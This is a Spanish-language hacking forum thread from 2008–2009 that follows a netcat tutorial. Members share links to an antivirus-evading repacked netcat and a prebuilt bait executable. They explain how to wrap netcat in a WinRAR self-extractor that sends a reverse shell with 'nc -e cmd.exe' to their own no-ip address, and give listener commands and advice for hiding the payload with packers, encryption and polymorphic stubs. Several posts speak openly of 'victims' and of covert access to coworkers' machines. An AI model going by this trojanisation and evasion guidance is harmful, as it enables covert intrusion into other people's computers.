http://descargas.jccharry.com/index.php?archivo=%2FBinarios%2FNetCat+indetectable.rar (http://descargas.jccharry.com/index.php?archivo=%2FBinarios%2FNetCat+indetectable.rar)

Probado en Nod32.


Título: Re: Jugando con netcat
Publicado por: Crazy.sx en 9 Julio 2008, 08:04 am
Un regalo para que sigan jugando con NetCat XD
Hice un nuevo NetCat que debería serf indetectable por muchos antivirus. Aunque hay mas formas de hacerlo solamente lo empaqueté en armadillo con certificado propio y sin mensaje de bienvenida.

Netcat Indetectable (No para el 100% de los av.)
http://descargas.jccharry.com/index.php?archivo=%2FBinarios%2FNetCat+indetectable.rar (http://descargas.jccharry.com/index.php?archivo=%2FBinarios%2FNetCat+indetectable.rar)

Probado en Nod32.

¿NOD32 detectaba como amenaza al netcat?. Pues yo uso NOD32 y siempre actualizado y al netcat no lo detecta. Yo uso cryptcat, y tampoco me lo detecta. Y en cuanto al método que uso para dejar indetectable un archivo es el que publicó octhal eliminando firmas (no así la heurística).



Título: Re: Jugando con netcat
Publicado por: WHK en 9 Julio 2008, 08:13 am
Citar
¿NOD32 detectaba como amenaza al netcat?. Pues yo uso NOD32 y siempre actualizado y al netcat no lo detecta. Yo uso cryptcat, y tampoco me lo detecta. Y en cuanto al método que uso para dejar indetectable un archivo es el que publicó octhal eliminando firmas (no así la heurística).

El nod32 toma al NetCat como Troyano Radmin al igual que cryptcat.

No dije que fuera 100% indetectable pero por lo menos va a sobrepasar a varios antivirus... el metodo de eliminar firmas al final te quedas sin archivo XD, el programa de e0n funcionaba bién pero no recoge argumentos.

Formas de hacerlo indetectable hay muchas, incluso creo que la mas optima es reconstruyendo el código fuente reemplazando variables y constantes y algunas funciones hacerlas trabajar de diferente manera pero con el mismo resultado, etc.

Al final si hablamos de eso mejor decimos que no es necesario utilizar netcat para troyanizar a alguien XD. Recuerda que esta sección es de Hacking Básico y si alguien quiere algo 100% indetectable que aprenda a programar sus propios troyanos en cpp o asm.

(http://img401.imageshack.us/img401/9519/dibujo4qv6.png)


Título: Re: Jugando con netcat
Publicado por: alone_in_the_dark en 12 Julio 2008, 08:03 am
Hola bkn tu manual, me motivaste jejej pondre a prueba tu manual jeje  :xD


Título: Re: Jugando con netcat
Publicado por: joseang en 12 Julio 2008, 20:05 pm
hola! tengo unas dudillas sore troyanizar el netcat con el winrar ave si me pueden ayudar:
-en el winrar troyanizandolo el netcat que tengo que poner mi ip publica mi no ip (joekankl.no-ip.org) o la ip de mi moden la del tipo 192.168.x.x ¿?
-ya que el netcat funciona como server y como cliente tengo una duda una vez que acabo el proiceso entero del winrar de troyanizarlo el nc ya con el icono cambiado y todo ese es el server que le tengo que dar a la persona no?
entoces el cliente como lo ejecuto? en ms-dos no? pero yo tengo que infectarme con el server que le pase a la persona?
por ahora eso aver si me podeis ayudar. enga salu2


Título: Re: Jugando con netcat
Publicado por: Zaraki_lkenpachi en 17 Julio 2008, 01:41 am
Hola [ joseang ] hay q apoyarnos entre Novatos  :P asi que mira segun entiendo al troyanizar el Netcat lo que haces es enviarle a el equipo remoto una linea asi que se conecte a tu equipo osea le pondrias tu DNS del NO-IP y el puerto q tu tenga abierto en tu PC con otro Netcat osea en tu Maquina haces lo siguiente | nc -vv -L -p 6666 | o cualquier otro puerto ten en cuenta q este puerto deberias de ponerlo en el archivo enviado asi el equipo remoto se conectara a tu PC eso es Conexion Inversa creo ... bueno pienso q es asi  :P si no corriganme q soy Newbie tbm.

Uhm No me dectecto tu NC ..  mi antivirus McAfee pero si me bloqueo el Puerto .. sabes como podria matar a mi antivirus creo q ese seria el termino (osea para q no me mande un mensaje de advertencia de que si el acceso va a ser permitido o No)

PD: Muy buen Post , aun no lo e leido pero ya regreso por ello xD ...

Saludos.


Título: Re: Jugando con netcat
Publicado por: joseang en 17 Julio 2008, 14:16 pm
y de donde saco mi dns del no-ip?


Título: Re: Jugando con netcat
Publicado por: Novlucker en 17 Julio 2008, 14:30 pm
Citar
joekankl.no-ip.org
  :rolleyes:


Título: Re: Jugando con netcat
Publicado por: joseang en 17 Julio 2008, 15:06 pm
novlucker que tengo que poner el no-ip? en lo del winrar esque los dns esos no los encuentro xd


Título: Re: Jugando con netcat
Publicado por: Novlucker en 17 Julio 2008, 15:22 pm
Si, debes de poner eso cuando creas el archivo de winrar...

Eso si, no intentes hacer cosas sin antes haber leído mucho :¬¬
http://es.wiktionary.org/wiki/DNS (http://es.wiktionary.org/wiki/DNS)

En este caso, el DNS es tu cuenta de no-ip
Citar
joekankl.no-ip.org

Lee y no preguntes tanto  :-X


Título: Re: Jugando con netcat
Publicado por: 4rg0rZ@cK en 18 Julio 2008, 16:13 pm
Te felicito gracias ati otros podremos crecer. gracias ::)


Título: Re: Jugando con netcat
Publicado por: ¹4¹² en 18 Julio 2008, 17:12 pm
Yo tengo una duda!! todo bn. Creo el carnada.exe correctamente. Pero para probarlo lo llevo en un pen a otro pc mio, y al abrirlo me sale el error de "no se encuentra el archivo". que me salga en mi pc xq tngo algo mal lo entiendo, xro xq me sale en otro pc que intento infectar? ayuda!
Otra cosa,en lugar de poner mi ip en el winrar, se puede poner la direccino de tu no-ip¿?
SAlu2 yg racias x el manual!


Título: Re: Jugando con netcat
Publicado por: xXx VaNn xXx en 19 Julio 2008, 03:08 am
InTeresante  ::) ..


Título: Re: Jugando con netcat
Publicado por: SeNeGe en 19 Julio 2008, 03:38 am
InTeresante  ::) ..

El muchacho esta preguntando, con respecto al winrar si le podes poner otra ip, con lo que viene despues.
salu2


Título: Re: Jugando con netcat
Publicado por: Chero en 19 Julio 2008, 04:41 am
se q es una ***** y kizas carezca de interes, pero a ver que os parece lo que e hecho con un bat... http://foro.elhacker.net/analisis_y_diseno_de_malware/netcat_con_bat_a_ver_que_os_parece-t221045.0.html (http://foro.elhacker.net/analisis_y_diseno_de_malware/netcat_con_bat_a_ver_que_os_parece-t221045.0.html)


Título: Re: Jugando con netcat
Publicado por: ¹4¹² en 19 Julio 2008, 11:05 am
Alguien me responde  ;D¿? es urgente...
SAlu2


Título: Re: Jugando con netcat
Publicado por: Chero en 19 Julio 2008, 12:24 pm
Pues yo diria que si se puede poner la direccion de tu no IP, q para eso esta, y con respecto a lootro no sabria decirte...


Título: Re: Jugando con netcat
Publicado por: WHK en 19 Julio 2008, 19:47 pm
Citar
"no se encuentra el archivo"
Es porque no encuentra el archivo que puede ser el netcat... talves el ciber tuene antivirus y te lo borra.

Cklaro que puedes poner tu no-ip en ves de tu ip aunque te banearán dentro de no mucho ya que los admins de no-ip prohiben estas cosas.
Busca otras alternativas, como por ejemplo poner tu ip en un txt en un host y que el netcat lo descargue y se conecte a esa ip con un loop goto.


Título: Re: Jugando con netcat
Publicado por: ¹4¹² en 28 Julio 2008, 16:52 pm
Citar
"no se encuentra el archivo"
Es porque no encuentra el archivo que puede ser el netcat... talves el ciber tuene antivirus y te lo borra.
Lo pruebo en otro pc mio, descativando el antivirus y todo....


Título: Re: Jugando con netcat
Publicado por: UnknownShadow en 30 Julio 2008, 21:11 pm
interesante, cuando pueda lo voy a probar


Título: Re: Jugando con netcat
Publicado por: kraszic en 2 Agosto 2008, 21:18 pm
buenas, e estado leyendo varios manuales como este sobre netcat, pero me gustaria saber si hay alguno q fuera de netcat desde 0 para los q no sabemos nada y queremos aprender a usarlo..

Tengo muchas dudas y preguntas q seguramente seran tontas y con un manual de menos nivel me aclararia todo.

saludos


Título: Re: Jugando con netcat
Publicado por: linuxvswindows en 6 Agosto 2008, 14:22 pm
Ahí te va uno para conexiones remotas para conexiones remotas:

http://foro.elhacker.net/tutoriales_documentacion/manual_de_netcat-t87109.0.html (http://foro.elhacker.net/tutoriales_documentacion/manual_de_netcat-t87109.0.html)

Y otro q sta Muy bueno:


http://zodiac-mitm.blogspot.com/2007/10/manual-netcat.html (http://zodiac-mitm.blogspot.com/2007/10/manual-netcat.html)

 :xD :laugh:


Título: Re: Jugando con netcat
Publicado por: linuxvswindows en 8 Agosto 2008, 23:12 pm
Para el que kería el carnada.exe q lo baje desde este link, tiene el nombre Listo.exe


http://www.mediafire.com/download.php?jmifc46vp3y (http://www.mediafire.com/download.php?jmifc46vp3y)


Nota: ya está armado, por lo tanto tienes que cambiarle la Ip, o Dns xq ese es el mío, ah!! y de vez en cuanto intenta hackearme.... (jejeje  >:D)


Título: Re: Jugando con netcat
Publicado por: GhozT en 15 Agosto 2008, 22:53 pm
señor usted es todo un maestro desearia ser como usted y creo q algun dia lo sere pero todavia no


Título: Re: Jugando con netcat
Publicado por: linuxvswindows en 16 Agosto 2008, 00:13 am
No seas lambeta, eso es un proyecto probado, aunque funcione, el tema de registro en ese link está mal, ya subiré el correcto


Título: Re: Jugando con netcat
Publicado por: -Wrrzag- en 21 Agosto 2008, 21:39 pm
yo tengo un pequeño problema: cuando pongo por ejemplo : nc -vv 123.123.123.123 80 (o cualquier otra ip y puerto) me sale:

Código:
123.123.123.123: inverse host lookup failed: h_errno 11004: NO_DATA
<UNKNOWN [123.123.123.123] 80 <http>: TIMEOUT
sent 0, rcvd 0: NOTSOCK

He buscado en google y en foros y no encuentro nada... alguien me puede decir qué pasa?


Título: Re: Jugando con netcat
Publicado por: linuxvswindows en 22 Agosto 2008, 21:16 pm
En realidad lo que estás tratando de hacer es una conexión directa, por lo que si el chavo tiene cortafuegos no lograrás nada, para evitar eso está esta práctica, la mayorá de los cortafuegos no permiten las conexiones entrantes, pero suelen permitir todas las salientes, y de eso se trata este subforo, si él intenta conectarse a tí (página 1) la sintaxis sería: -vv -L -p 80 (suponiendo que hubieras seguido las instrucciones al pie de la letra obtendrias su shell.

Otra opción es esta: http://foro.elhacker.net/tutoriales_documentacion/manual_de_netcat-t87109.0.html (http://foro.elhacker.net/tutoriales_documentacion/manual_de_netcat-t87109.0.html)

Pero recuerga lo del cortafuegos, te recomendaría leer las revistas HxC, aunq son viejas, pero tienen varias formas interesantes de saltarse un cortafuegos que te darán una idea realmente importante.


Título: Re: Jugando con netcat
Publicado por: -Wrrzag- en 23 Agosto 2008, 11:12 am
Vale, lo voy entendiendo  ;D

Pero en la 2a entrega :), la de los mails, tambien me lo pone y no me fuciona... Es por lo mismo?


Título: Re: Jugando con netcat
Publicado por: linuxvswindows en 23 Agosto 2008, 12:30 pm
No, acá el problema es q necesitas un servidor SMTP q te envíe el mail, xq netcat sólo actúa como cliente de correo, y entonces necesitarías un servidor y para eso está el mini relay que se muestra en la práctica. ;)


Título: Re: Jugando con netcat
Publicado por: -Wrrzag- en 25 Agosto 2008, 19:01 pm
vale, entendido  ;D (mas o menos XD). Gracias :-*


Título: Re: Jugando con netcat
Publicado por: Darkcharly en 19 Septiembre 2008, 22:03 pm
Hola te queria felisitar por tu tutorial esta chido pero tengo una pregunta disculpen si es una pregunta tonta pero esque soy nuevo en esto type email.txt| en ese texto solo quisiera saber como puedo poner ese ultimo simbolo porque todavía no se como ponerlo ;D


Título: Re: Jugando con netcat
Publicado por: Novlucker en 19 Septiembre 2008, 23:05 pm
 :xD Alt Gr+1 o Ctrl+Alt+1


Título: Re: Jugando con netcat
Publicado por: Darkcharly en 20 Septiembre 2008, 01:40 am
:xD Alt Gr+1 o Ctrl+Alt+1


Hey muchas gracias ::)


Título: Re: Jugando con netcat
Publicado por: lonexino en 23 Septiembre 2008, 11:54 am
Hola amigos, nada solo queria decir que no se por que no se ven las imagenes del tutorial eso era nada más, gracias y un cordial saludo.


Título: Re: Jugando con netcat
Publicado por: _Cthulhu_ en 1 Noviembre 2008, 11:13 am
Yo tambien digo lo mismo, seria mucha molestia reponer las imagenes? creo que la mitad del tutorial se pierde justamente por eso.


Título: Re: Jugando con netcat
Publicado por: softdates en 7 Noviembre 2008, 01:18 am
 todo sobre netcat

desde hace mas de unos 5 años ya es un programa viejo y recontraconocido por los antivirus pero igual les dejo un link http://www.usuarios.lycos.es/orlyyan/ hay una recopilacion interesante.


Título: Re: Jugando con netcat
Publicado por: cyberastrologic en 12 Noviembre 2008, 06:11 am
esta muy bueno el manual hermano pero no veo las fotos, y cuando la persona ejecute el troyano como podre saberlo o acceder?  :huh:


Título: Re: Jugando con netcat
Publicado por: Axus en 13 Noviembre 2008, 03:15 am
esta muy bueno el manual hermano pero no veo las fotos, y cuando la persona ejecute el troyano como podre saberlo o acceder?  :huh:

Ponte en contacto por privado para que verifique los enlaces de las imágenes.

Saludos*


Título: Re: Jugando con netcat
Publicado por: Subbzero en 15 Noviembre 2008, 20:00 pm
Buenas!

Talvez me puedan dar una manito :P.

Estoy tratando de que el cmd me tome el netcat como comando valido (ya lei lo del path pero sigue sin funcionar). Hice todo lo que encontre (no lei todo este threat porque tiene 37 paginas y me iba a tomar un año :P).

Lo que si no logre, y creo que aca esta mi problema, es que no puede bajarme el netcat para nt ni del elhacker.net ni de otras paginas (me baje los otros dos netcat para pobrar y tampoco me funcionan). Todas me redireccionan a vulnwatch y al parecer esta caida o fuera de servicio.

Desde ya muchas gracias,
Sub.-


Título: Re: Jugando con netcat
Publicado por: APOKLIPTICO en 15 Noviembre 2008, 22:29 pm
Copialo a la carpeta de windows.


Título: Re: Jugando con netcat
Publicado por: Subbzero en 16 Noviembre 2008, 02:02 am
Copialo a la carpeta de windows.

Yo lo copie. Dentro de la carpeta windows y dentro de system32 tambien.

Un abrazo,
Sub.-


Título: Re: Jugando con netcat
Publicado por: D4RIO en 18 Noviembre 2008, 03:18 am
softdates: Eso tambien es de Yan... jeje, de todas formas NetCat no tiene porque ser tenido en cuenta como una amenaza, y si se quieren entretener aprendan C y saquen las funciones que necesiten, usen NetCat como base para crear DLL's, encriptenlas, hagan ejecutables polimórficos, extraigan los binarios, creen infecciónes con código de NetCat... precisamente para eso es software libre y viene con el código fuente. Saber usar la herramienta desde la línea de comandos no es muy guaaay... si te cuesta mucho jamas te sientes a manejar un Unix o moririas en el intento... jaja! diviertanse con el hacking, sino no tiene gracia.


Título: Re: Jugando con netcat
Publicado por: alexvem en 18 Noviembre 2008, 04:00 am
usen NetCat como base para crear DLL's, encriptenlas

un programa que lo pasen a dll o que tomen referencias para hacer dll's con un ejecutable? orale xD


Título: Re: Jugando con netcat
Publicado por: D4RIO en 18 Noviembre 2008, 18:21 pm
Viene con los fuentes... no es gran cosa, pero tienen que ponerle pilas y agarrar lapiz y papel. Después se puede crear un encriptador con ASM (o con C) y mandar la DLL cifrada/empacada con un stub (o más, para hacerlo polimórfico) y con eso trabajar desde otro ejecutable, o crear un fragmento binario para infección. Para eso deberán tener en claro ASM y conocer los formatos ejecutables que infectarán, o formatos de archivo... es el puro arte del hacking.Si se la pasan liando con el %PATH% nunca van a llegar a divertirse...


Título: Re: Jugando con netcat
Publicado por: softdates en 27 Noviembre 2008, 00:36 am
Que tal D4RIO soy el mismo yan me baneron el nick pero vaa siempre ando merodeando por aqui el tema del netcat siempre va ser interesante pero como dije es algo ya un poco antiguo en lo personal aun lo uso en mi oficina y vale para concectarme con las maquinas de mis "compañeros". y lo cifrar dllso realizar envenenamientos de
procesos vaya que es una lata proximamente subire un manual 


Título: Re: Jugando con netcat
Publicado por: jorge0023 en 1 Diciembre 2008, 08:03 am
que tal compa me he leido el manual y estoy tratando de penetrar una pc a base de un exploit que abre el puerto 28876 pero al poner al netcat en escuha de esta manera nc -l -vv -p 80 <c: ndex.html para subirle el exploit al otro pc para que se lo cargue cuando le pase el link donde esta mi host falso me sale este error c:\users\jorge> c:index.html: forward host lookup failed: h_errno 11004: NO_DATA y no me pone ala escucha alguien podria ayudarme porfa???


Título: Re: Jugando con netcat
Publicado por: ViperDoom en 11 Enero 2009, 00:14 am
yo tengo una duda.... suponiendo que yo estoy en una Lan dentro de una Wan.... que direccion de IP le pongo al Netcat, para lograr una conexión inversa, si se lo mando a alguien fuera de la Wan a la que pertenesco??.... y para alguien que este en la misma Wan..??? .... ya se , porke lo probe que para la Lan va la 192.168......

muchas gracias desde ya!


Título: Re: Jugando con netcat
Publicado por: dantemc en 11 Enero 2009, 00:30 am
tu ip externa, con el router mapeado para que el puerto que elijas lo dirija solo a tu equipo.

en esencia debes mapear el puerto.


Título: Re: Jugando con netcat
Publicado por: ViperDoom en 12 Enero 2009, 13:28 pm
tu ip externa, con el router mapeado para que el puerto que elijas lo dirija solo a tu equipo.

en esencia debes mapear el puerto.

Te molestaria dejar un ejemplo de como hacerlo?

muchas gracias desde ya!


Título: Re: Jugando con netcat
Publicado por: Novlucker en 12 Enero 2009, 14:07 pm
Básicamente...
   
[Manual]Abrir puertos a los Routers  (https://foro.elhacker.net/redes/manualabrir_puertos_a_los_routers-t91300.0.html)
<--- click

Saludos  ;)


Título: Re: Jugando con netcat
Publicado por: ViperDoom en 13 Enero 2009, 11:52 am
perdon, el ejemplo lo pido pero para el netcat.... como mapeo puertos con el ??? o fijate mi pregunta en el post de arriba....


yo tengo una duda.... suponiendo que yo estoy en una Lan dentro de una Wan.... que direccion de IP le pongo al Netcat, para lograr una conexión inversa, si se lo mando a alguien fuera de la Wan a la que pertenesco??.... y para alguien que este en la misma Wan..??? .... ya se , porke lo probe que para la Lan va la 192.168......

muchas gracias desde ya!



gracias


Título: Re: Jugando con netcat
Publicado por: Novlucker en 13 Enero 2009, 11:57 am
Y la respuesta es  :¬¬

Básicamente...
   
[Manual]Abrir puertos a los Routers  (https://foro.elhacker.net/redes/manualabrir_puertos_a_los_routers-t91300.0.html)
<--- click

No puedes mapear puertos con netcat, los puertos se mapean en la configuración del router de la red, hacia la pc en lan/wan, en este caso la tuya.
Tu pondrás la IP externa (y puerto), entonces la conexión inversa llegará al router, y como el router va a tener mapeado el puerto lo va a redirigir hacia tu pc  :D

Para dentro de la red, simplemente la IP interna

Saludos


Título: Re: Jugando con netcat
Publicado por: ViperDoom en 13 Enero 2009, 12:12 pm
Ya la respuesta es  :¬¬

Básicamente...
   
[Manual]Abrir puertos a los Routers  (https://foro.elhacker.net/redes/manualabrir_puertos_a_los_routers-t91300.0.html)
<--- click

No puedes mapear puertos con netcat, los puertos se mapean en la configuración del router de la red, hacia la pc en lan/wan, en este caso la tuya.
Tu pondrás la IP externa (y puerto), entonces la conexión inversa llegará al router, y como el router va a tener mapeado el puerto lo va a redirigir hacia tu pc  :D

Para dentro de la red, simplemente la IP interna

Saludos


Muchas gracias!!!!


Título: Transferencia de archivos
Publicado por: D3fkoN en 19 Enero 2009, 17:08 pm
hola!!!  ya tengo la conexion de shell inversa .. pero no se como transferir archivos de la pc remota a la mia o viceversa  agradezco su ayuda .. :)


Título: Re: Jugando con netcat
Publicado por: D4RIO en 20 Enero 2009, 00:51 am
La shell es solo eso... un shell.. Debes saber transferir archivos usando la linea de comandos... o sea, conocer programas para hacerlo. Siempre lo más fácil es usar wget para descargar archivos a la PC remota, poniendo por ejemplo un server HTTP como HFS o APACHE si querés exagerar un poco.
La cosa para sacar archivos de una maquina remota es usar un server en la maquina remota y un cliente en la tuya, que sería a la inversa. Podrías ponerle un server FTP.

Eso fue un poco rápido, porque en realidad es algo que se discutio bastante en el Hilo...


Título: Re: Jugando con netcat
Publicado por: Missy en 10 Marzo 2009, 11:22 am
Muy buenos posts.
Los primeros 2 dias funciono...
pero ahora no se me conecta (y se cuando reinician/prenden la pc)...cuando lo hacen, yo ya tengo el netcat a la escucha del puerto 80 y nada......y ahora se le dio por tirarme el error "host lookup failed: h_errno 11004: NO_DATA ".. lei las 38 pag. y las veces que se citaron, nadie posteo una respuesta a esto...

help pls :*




Título: Re: Jugando con netcat
Publicado por: APOKLIPTICO en 11 Marzo 2009, 14:43 pm
Le cambio la IP o te cambio la IP?


Título: Re: Jugando con netcat
Publicado por: Missy en 11 Marzo 2009, 19:32 pm
Le cambio la IP o te cambio la IP?

esta todo puesto perfecto, al igual que lo puse por dns (con el no ip).
y ocurrio eso..
el primer dia la victima lo abrio y se conecto a mi.
el segundio dia por la mañana cuando prendio la pc se volvio a conectar a mi, por otras cuestiones yo cerre la shell (me tenia q ir), cuando volvi, volvi a dejarlo a la escucha..ese dia, reinicio la pc en ciertas oportunidades y nunca me figuro que se conecto.....
y ahora directamente no se conecta ni cuando le da doble click al nc troyanizado.
y si lo hace (q no lo hace) me tirra ese error 1100*** no data etc....

esta por puerto 80 asi q el fw no lo para.
y el antv nunca lo detecto como virus/troyano (ademas de q cuando gane shell por las dudas se lo elimine)

:S wtf!


Título: Re: Jugando con netcat
Publicado por: damiak en 18 Marzo 2009, 18:54 pm
HOLA,no consigo descargar el net del enlace de esta pagina lo he intentado desde otras incluso desd la pagina oficial de gnu.  Lo que consiguio bajar no funcionava o eran archivos que windows no pudo abrir. ¿por que? es que no es compatible cn  W xp o  ¿existen otros programas como netgato por lo que me he informado de este net es algo muy intrigante por lo que dicen en la official page  gnu. :silbar:


Título: Re: Jugando con netcat
Publicado por: ternet en 27 Abril 2009, 14:11 pm
sigue siendo indetectable a los antivirus???


saludos y muy buen manual, perfectamente explicado


Título: Re: Jugando con netcat
Publicado por: Novlucker en 27 Abril 2009, 14:14 pm
Para algunos  :rolleyes:

Saludos


Título: Re: Jugando con netcat
Publicado por: Talmannon en 3 Mayo 2009, 21:16 pm
Tengo un problema con netcat, hice todo lo del manual, pero solo me funciona en redes locales. Por ejemplo, si hago esto en otro ordenador conectado al mismo router, pues me funciona; si hago red local con otro ordenador de otra red con Hamachi, me funciona, pero si con este ordenador al que me conecto mediante Hamachi, me conecto sin Hamachi, pues no me coge la conexión de netcat...

Utilizo el puerto 4455, porque el 80 no me iba. El firewall no da ningún problema, y el antivirus tampoco. Hago shell inversa con el otro ordenador, y en vez de mi ip le pongo un DNS, utilizando no-ip. El DNS me va bien tanto si es para red local como si es para internet, pero, como ya dije, el que no va es netcat.

¿Tengo que abrir mis puertos (y los de la víctima)?


Título: Re: Jugando con netcat
Publicado por: braulio-- en 3 Mayo 2009, 21:30 pm
Si el server lo tienes en tu ordenador tienes que abrir (o mapear) los puertos de tu router


Título: Re: Jugando con netcat
Publicado por: carlipus en 7 Mayo 2009, 18:57 pm
Novlucker he leido que no se puede mapear puertos con netcat, es una pena!! jeje

No hay ninguna forma de poder mapear los puertos accediendo desde netcat. Pense que como en telnet se pueden mapear los puertos del router, también se podería con netcat.
¿Habrá alguna forma?
gracias.


Título: Re: Jugando con netcat
Publicado por: braulio-- en 7 Mayo 2009, 22:09 pm
No soy novlucker, pero creo que te puedo responder.
Si el router tie puedes conectar  por telnet solo tienes que conectarte con el netcat al router en el puerto 23 y podrás usarlo como por telnet.


Título: Re: Jugando con netcat
Publicado por: carlipus en 7 Mayo 2009, 23:16 pm
una vez dentro de netcat, pongo telnet ip y no pasa absolutamente nada, por eso te digo que asi de esa forma no funciona.

gracias por contestar


Título: Re: Jugando con netcat
Publicado por: braulio-- en 8 Mayo 2009, 16:47 pm
Pero asi no se usa netcat, con la cmd, te vas a la carpeta donde tengas el nc y en esa carpeta escribes :
Código:
nc ipdelrouter 23
Y tepedira la password y el user , es posible que tu router no tenga acceso por telnet.


Título: Re: Jugando con netcat
Publicado por: carlipus en 8 Mayo 2009, 17:04 pm
creo que me explicado mal, o no me has entendio.

Vamos a ver, a lo que me refiero es si, una vez se acceda a un pc remoto por netcat, si desde esa consola del pc remoto, se puede acceder al router, entiendes?

He probado telnet y no va


Título: Re: Jugando con netcat
Publicado por: braulio-- en 8 Mayo 2009, 22:57 pm
Ah, ya lo entiendo.
Eso ya no lo se, igual pusiste mal la ip del router o algo asi..


Título: Re: Jugando con netcat
Publicado por: carlipus en 9 Mayo 2009, 10:16 am
no puse mal la ip del router xd

aver si alguien me lo confirma


Título: Re: Jugando con netcat
Publicado por: WHK en 12 Mayo 2009, 12:34 pm
Hola, actualicé las imagenes y el link de descarga para los videos de los primeros post  porque veo a varios un poco complicados, talves con las imagenes se les haga un poco mas facil.

Saludos!


Título: Re: Jugando con netcat
Publicado por: zeiram en 14 Mayo 2009, 03:13 am
Hola a todos. Llevo intentando realizar la primera prueba del netcat pero me es imposible. He probado añadiendo contraseña al rar para que no pueda detectar lo que hay dentro, y mandarlo por mail. Pero en cualquier caso que he probado, me sale el fallo win32.

He probado tanto con netcat 1.0 como 1.1, alguna sugerencia? Ya no sé que más hacer.


Título: Re: Jugando con netcat
Publicado por: WHK en 20 Mayo 2009, 08:14 am
Si te sigue saliendo lo del fallo de win32 es porque hay un error al intentar cambiarle el ícono al netcat, prueba bajando otraves el netcat e intentas agregarselo nuevamente.

Recuerdo que el netcat estaba comprimido en su versión 1.1 y por eso daba error al intentar modificarlo, talves puedas desempacarlo pero es mas fácil para ti que lo busques directamente.

Off topic:
Pueden hechar un vistazo al proyecto BHC y adjuntar bats ejecutables al mismo rar, si les gusta también pueden votar por el  :P es mi proyecto.
Acá se vota ->
http://foro.elhacker.net/analisis_y_diseno_de_malware/abril_negro_2009_encuesta_del_concurso_de_desarrollo_de_malware-t255183.0.html
Acá se lee como se usa ->
http://foro.elhacker.net/analisis_y_diseno_de_malware/bhc_batch_hide_compiler_20_by_whk_proyecto_para_abril_negro-t253872.0.html

La descarga como siempre es 100% libre.


Título: Re: Jugando con netcat
Publicado por: Neo_1979 en 7 Junio 2009, 15:41 pm
No está mal, veo que conoces  bien MS -DOS. Mola el aporte. Sin duda alguna...


Título: Re: Jugando con netcat
Publicado por: Meeriin en 21 Junio 2009, 02:29 am

a mi me pasa esto cuando quiero madnar el mail:

(http://img25.imageshack.us/img25/1443/dibujo23ezs.jpg) (http://img25.imageshack.us/i/dibujo23ezs.jpg/)


Cual seria el problema?  :huh:


Título: Re: Jugando con netcat
Publicado por: APOKLIPTICO en 21 Junio 2009, 04:10 am
No tenes un server smtp en tu PC.


Título: Re: Jugando con netcat
Publicado por: Meeriin en 21 Junio 2009, 04:55 am

ah grax! y tengo otra duda eje

lo del netcat solo me anda, si primero en mi pc pongo el puerto a la escucha y luego ejecuto el otro codigo en la pc "victima"
pero si lo hago al revez (primero el ejecuto nc -e cmd.exe blabla 23 y luego voy a mi pc y lo pongo a la escucha con nc -vv -L blabla -p 23) no encuentra nada.

que puedo hacer?  :huh:


Título: Re: Jugando con netcat
Publicado por: MasterPunk en 1 Julio 2009, 02:06 am
1 duda...

veo que al final de "Jugando con netcat I" pones un enlace para descargar el netcat 1.0...
no habias dicho que hacia falta l 1.1???

(igual esto ya esta respondido, pero como es comprensible no voy a leerme 40 paginas de mensajes...)


Título: Re: Jugando con netcat
Publicado por: softdates en 1 Julio 2009, 07:46 am
 todo sobre netcat

desde hace mas de unos 6 años que lo he usado ,ya es un programa viejo y recontraconocido por los antivirus pero igual les dejo un link http://www.usuarios.lycos.es/orlyyan/

hay una recopilacion interesante.

PD: no anden enviando mensaje al admin de la pagina, no sabe que tiene una jajaja

WHK por favor ponerlo como referencia a los nuevos.....Gracias


Título: Re: Jugando con netcat
Publicado por: iAssassin en 9 Julio 2009, 20:14 pm
No tenes un server smtp en tu PC.

me pasa el mismo error que "Meeriin" pero como hago un server smtp?


Título: Re: Jugando con netcat
Publicado por: JOGUI22 en 25 Julio 2009, 13:51 pm
Hola amigos, estoy intentando hacer la primera parte de le tuto, pero me asalta una gran duda, hoy en dia, por lo menos aqui en españa, casi todo el mundo la tiene dinamica, por lo cual cambia cada dos por tres.
Cuando tengo de poner mi IP, al tenerla dinamica, cuando el user tenga el troyano, y yo apague el router, se me cambiara la ip, por lo que habre perdido el user, ya que el troyano tiene mi ip para que me envie los resultados y poder rastrearlo con en netcat.
Con IP dinamica que hago?
Gracias amigos ;)

Un saludo.


Título: Re: Jugando con netcat
Publicado por: kamsky en 25 Julio 2009, 13:55 pm
busca cosas como no-ip

un saludo


Título: Re: Jugando con netcat
Publicado por: softdates en 25 Julio 2009, 20:14 pm
 todo sobre netcat

desde hace mas de unos 6 años que lo he usado ,ya es un programa viejo y recontraconocido por los antivirus pero igual les dejo un link http://www.usuarios.lycos.es/orlyyan/

hay una recopilacion interesante.

Al admin pongalo como referencia

WHK por favor ponerlo como referencia a los nuevos.....Gracias


Título: Re: Jugando con netcat
Publicado por: dark moon en 29 Julio 2009, 19:34 pm
He visto todo el tutorial i no me salia estuve aislando parte por parte comprobando que fallaba i me di cuenta que el fallo esta en cuando le cambio el icono vi mas arriba qu se arregla usando la version 1.0 en lugar de la 1.1 pero no la encuentro por ningun sitio supongo que porke es mas antigua i algun link que havia estaba caido alguine tiene la version 1.0 ?


Título: Re: Jugando con netcat
Publicado por: kamsky en 30 Julio 2009, 00:24 am
http://www.4shared.com/file/47149249/4df72120/netcat-10w.html

espero que te sirva


Título: Re: Jugando con netcat
Publicado por: PortalBlock en 8 Agosto 2009, 12:12 pm
un gran post amigo...


Título: Re: Jugando con netcat
Publicado por: PrOtOhack en 23 Agosto 2009, 16:35 pm
Hola ya he creado el server pero a la ora de crear el cliente le pongo al netcat:
C:\Windows>nc -vv -L -p 80 le doy a enter y no pasa nada
voy a la carpeta y no ai nada
que es lo que pasa


Título: Re: Jugando con netcat
Publicado por: kamsky en 23 Agosto 2009, 19:25 pm
Servidor:

Código:
antonio@hack4free:~$ sudo nc -vv -l -p 80
listening on [any] 80 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 42911
pepe
^C sent 0, rcvd 5

Cliente:

Código:
antonio@hack4free:~$ sudo nc -vv localhost 80
localhost [127.0.0.1] 80 (www) open
pepe
 sent 5, rcvd 0


Título: Re: Jugando con netcat
Publicado por: pololo08 en 5 Septiembre 2009, 23:33 pm
hola qria saber unas cositas sobre el primer ejersicio (tengan paciencia soy re nuevo xD)

1ro: en la parte cuando ponemos q nos llame al puerto 80 .. la ip q ponemos.. es la del modem y no la del router no? ... tipo no pongo 168.192.0.1 si no q pongo la posta posta no?... (mepa q media boludina la preg pero bueno...

2do: yo le paso este archivo a mi victima.... tengo q estar antes de pasarselo con el cmd avierto y ya puesto el nc -vv -L -p 80?

